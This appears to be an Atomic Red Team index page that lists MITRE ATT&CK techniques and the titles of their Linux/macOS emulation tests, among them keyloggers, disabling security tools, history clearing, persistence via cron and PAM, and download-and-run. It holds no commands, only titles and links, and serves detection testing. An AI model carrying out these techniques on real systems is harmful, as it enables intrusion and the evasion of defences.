- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- Atomic Test #3: Clear bash history [linux]
- Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
- Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
- Atomic Test #6: Setting the HISTFILE environment variable [linux]
- Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- Atomic Test #38: Clear History [linux]
- Atomic Test #39: Suspend History [linux]
- Atomic Test #40: Reboot Linux Host via Kernel System Request [linux]
- Atomic Test #41: Clear Paging Cache [linux]
- Atomic Test #42: Disable Memory Swap [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
- Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #2: Space After Filename [macos, linux]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Append to the system shell profile [linux]
- Atomic Test #4: Append commands to user shell profile [linux]
- Atomic Test #5: System shell profile scripts [linux]
- Atomic Test #6: Create/Append to .bash_logout [linux]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service, Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #27: Linux Download File and Run [linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
